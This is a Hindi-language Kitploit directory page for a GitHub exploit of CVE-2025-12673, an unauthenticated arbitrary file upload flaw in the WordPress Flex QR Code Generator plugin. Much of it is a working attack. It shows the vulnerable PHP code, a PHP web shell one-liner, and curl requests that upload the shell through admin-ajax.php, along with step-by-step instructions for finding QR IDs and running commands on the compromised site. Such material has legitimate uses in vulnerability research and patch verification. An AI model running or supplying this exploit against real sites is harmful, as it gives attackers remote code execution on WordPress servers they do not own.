Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-12673 — Flex QR Code Generator <= 1.2.6 - अप्रमाणित मनमानी फ़ाइल अपलोड | Kitploit
उपकरण/GitHubGitHub/d0n601/cve-2025-12673
पेलोड जनरेशनभेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubd0n601/cve-2025-12673

CVE-2025-12673

Flex QR Code Generator <= 1.2.6 - अप्रमाणित मनमानी फ़ाइल अपलोड

रिपॉजिटरी देखें
210 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Flex QR Code Generator <= 1.2.6 - अप्रमाणिकृत मनमाना फ़ाइल अपलोड

Flex QR Code Generator प्लगइन अपने update_qr_code AJAX एंडपॉइंट में उपयोगकर्ता अनुमति को मान्य नहीं करता है और फ़ाइल अपलोड को सैनिटाइज़ नहीं करता है, जिससे अप्रमाणिकृत हमलावर PHP स्क्रिप्ट सहित मनमानी फ़ाइलें अपलोड कर सकते हैं, जिसके परिणामस्वरूप रिमोट कोड निष्पादन होता है।

TL;DR शोषण

root@kitploit:~
# PHP वेबशेल अपलोड करें
echo '<?php system($_GET["cmd"]); ?>' > shell.php
curl -X POST "https://victimsite.com/wp-admin/admin-ajax.php" \
  -F "action=flexqr_update_qr" \
  -F "qrId=1" \
  -F "qrData={\"data\":\"https://example.com\"}" \
  -F "[email protected]"

विवरण

यह भेद्यता FlexQrCodeGenerator वर्ग की update_qr_code विधि में मौजूद है। प्लगइन अप्रमाणिकृत उपयोगकर्ताओं के लिए AJAX एंडपॉइंट पंजीकृत करता है, जिससे कोई भी आगंतुक मनमानी फ़ाइलें अपलोड कर सकता है जो WordPress अपलोड निर्देशिका में संग्रहीत हो जाती हैं।

भेद्य कोड /qr-code-generator.php:457-589 से:

root@kitploit:~
public function update_qr_code()
{
  if (isset($_POST['qrData']) && isset($_POST['qrId'])) {
    // ... सत्यापन कोड ...
    
    // लोगो (फ़ाइल अपलोड) को संभालें
    if (isset($_FILES['logo']) && $_FILES['logo']['error'] === UPLOAD_ERR_OK) {
      $logo = $_FILES['logo'];
      $upload_dir = wp_upload_dir();
      
      $file_ext = pathinfo($logo['name'], PATHINFO_EXTENSION);
      $file_name = pathinfo($logo['name'], PATHINFO_FILENAME);
      $new_file_name = $file_name . '_' . $qrId . '.' . $file_ext;
      $file_path = $upload_dir['path'] . '/' . $new_file_name;
      
      if (move_uploaded_file($logo['tmp_name'], $file_path)) {
        // फ़ाइल सफलतापूर्वक अपलोड हुई
      }
    }
  }
}

फ़ाइल निष्पादन /qr-code-generator.php:504 से:

root@kitploit:~
if (move_uploaded_file($logo['tmp_name'], $file_path)) {
  $logo_url = $upload_dir['url'] . '/' . $new_file_name;
  $logo_url = str_replace(home_url(), '', $logo_url);
  $update_data['logo_url'] = $logo_url;
}

अप्रमाणिकृत पहुँच /qr-code-generator.php:41-42 से:

root@kitploit:~
add_action('wp_ajax_flexqr_update_qr', [$this, 'update_qr_code']);
add_action('wp_ajax_nopriv_flexqr_update_qr', [$this, 'update_qr_code']);

मैन्युअल पुनरुत्पादन

  1. लक्ष्य की पहचान करें जिसमें Flex QR Code Generator प्लगइन स्थापित है
  2. मौजूदा QR कोड ID खोजें:
root@kitploit:~
curl -X POST "https://victimsite.com/wp-admin/admin-ajax.php" \
  -d "action=flexqr_fetch_qr_code" \
  -d "per_page=10" \
  -d "page=1"
  1. दुर्भावनापूर्ण PHP फ़ाइल अपलोड करें:
root@kitploit:~
echo '<?php system($_GET["cmd"]); ?>' > shell.php
curl -X POST "https://victimsite.com/wp-admin/admin-ajax.php" \
  -F "action=flexqr_update_qr" \
  -F "qrId=1" \
  -F "qrData={\"data\":\"https://example.com\"}" \
  -F "[email protected]"
  1. अपलोड की पुष्टि करें shell_1.php के लिए अपलोड निर्देशिका की जाँच करके
  2. आदेश निष्पादित करें अपलोड की गई फ़ाइल पर ?cmd=whoami के साथ जाकर
टूल डाउनलोड करें